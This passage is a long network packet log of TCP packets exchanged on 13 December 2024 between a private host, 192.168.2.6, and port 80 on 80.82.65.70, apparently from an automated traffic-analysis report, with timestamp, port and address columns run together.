                                              Dec 13, 2024 10:49:16.855056047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.855068922 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.855087996 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.855114937 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.855309010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.855444908 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.855932951 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.855972052 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.856057882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.856103897 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.857781887 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.857795954 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.857808113 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.857841015 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.857877970 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.858844042 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.858856916 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.858871937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.858885050 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.858901024 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.858917952 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.859843969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.859855890 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.859893084 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.943065882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.943089962 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.943145990 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.943182945 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.943185091 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.943234921 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.943352938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.943394899 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.944272995 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.944288015 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.944314003 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.944329977 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.944852114 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.944891930 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.944961071 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.945156097 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.945826054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.946079969 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.946732998 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.946748018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.946762085 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.946784019 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.946813107 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.947979927 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.947998047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.948024988 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.948050022 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.949105978 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.949114084 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.949166059 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.949668884 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.949685097 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.949713945 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.949745893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.950625896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.950645924 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.950680017 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.951311111 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.951392889 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.951410055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.951438904 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.952928066 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.952944040 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.952974081 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.953001022 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.953627110 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.953641891 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.953682899 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.954128981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.954143047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.954231977 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.955213070 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.955228090 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.955265045 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.955279112 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.955904961 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.955954075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.956082106 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.956166983 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.956832886 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.956882000 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.956986904 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.957026005 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.957704067 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.957743883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.957811117 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.957859039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.958740950 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.958756924 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.958790064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.958801985 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.959630966 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.959644079 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.959695101 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.960520983 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.960576057 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.960582018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.960627079 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.961394072 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.961463928 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.961500883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.961549044 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.962459087 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.962476969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.962526083 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.963258028 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.963318110 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.025497913 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.025526047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.025541067 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.025579929 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.025612116 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.026475906 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.026489019 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.026504040 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.026523113 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.026560068 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.027375937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.027420998 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.027646065 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.027702093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.027736902 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.028693914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.028707027 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.028755903 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.028776884 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.029661894 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.029675961 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.029702902 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.029720068 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.031147957 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.031162977 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.031205893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.031375885 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.031388044 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.031440020 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.032234907 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.032352924 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.032355070 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.032418966 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.033518076 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.033531904 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.033555031 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.033577919 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.034265041 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.034277916 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.034357071 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.035079002 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.035093069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.035115004 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.035141945 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.035859108 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.035902977 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.036024094 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.036077976 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.036906004 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.036946058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.036984921 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.038012981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.038026094 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.038074970 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.038074970 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.038726091 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.038775921 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.038799047 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.038814068 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.039618969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.039717913 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.039784908 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.039818048 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.040565014 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.040632010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.040664911 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.041455984 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.041507006 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.041559935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.041593075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.043338060 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.043349981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.043361902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.043409109 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.043473005 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.043524981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.045103073 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.045114994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.045126915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.045146942 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.045172930 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.046124935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.046135902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.046152115 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.046173096 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.046195984 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.047272921 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.047285080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.047322035 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.047332048 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.048887968 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.048903942 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.048917055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.048964977 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.048976898 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.050026894 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.050041914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.050055027 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.050074100 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.050093889 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.051372051 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.051387072 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.051419973 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.051444054 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.051842928 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.051852942 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.051899910 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.135005951 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.135027885 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.135092020 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.135116100 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.135329008 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.135447025 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.135454893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.135479927 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.136082888 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.136159897 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.136162043 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.136200905 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.136985064 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.137027979 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.137083054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.137154102 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.137904882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.137948036 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.138001919 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.138037920 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.425712109 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.425839901 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.426404953 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.426528931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.426738024 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.426867008 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.427340984 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.427440882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.427467108 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.427494049 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.428615093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.428631067 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.428798914 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.429689884 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.429714918 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.429775953 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.429775953 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.430242062 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.430244923 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.430526972 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.431056023 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.431178093 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.431222916 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.431319952 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.431958914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.432082891 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.432105064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.432241917 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.432923079 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.433070898 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.433522940 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.434005022 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.434020042 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.434082985 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.434082985 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.435029984 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.435045958 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.435106039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.435724020 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.435738087 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.435807943 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.519073963 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.519171000 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.519198895 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.519447088 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.519587994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.519617081 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.519635916 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.520075083 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.520576000 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.520664930 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.520817995 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.521456957 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.521766901 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.521806002 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.521892071 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.522612095 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.522628069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.522954941 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.523308039 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.523462057 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.523493052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.523564100 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.524382114 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.524396896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.524518013 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.525208950 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.525312901 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.525432110 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.525486946 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.526326895 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.526341915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.526540995 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.527174950 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.527188063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.527250051 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.527250051 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.527973890 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.528067112 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.528100967 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.528150082 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.528886080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.528944969 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.529027939 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.529088974 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.529783010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.529974937 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.530004978 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.530059099 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.530761003 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.530802011 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.530822992 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.530929089 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.531625032 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.531697989 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.531847000 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.531940937 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.532680035 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.532798052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.532824039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.532866001 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.533438921 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.533545017 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.533617973 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.533698082 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.534564972 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.534622908 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.534642935 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.534944057 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.535303116 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.535361052 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.535554886 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.536360979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.536372900 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.536421061 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.536501884 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.537175894 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.537237883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.537427902 CET804985880.82.65.70192.168.2.6
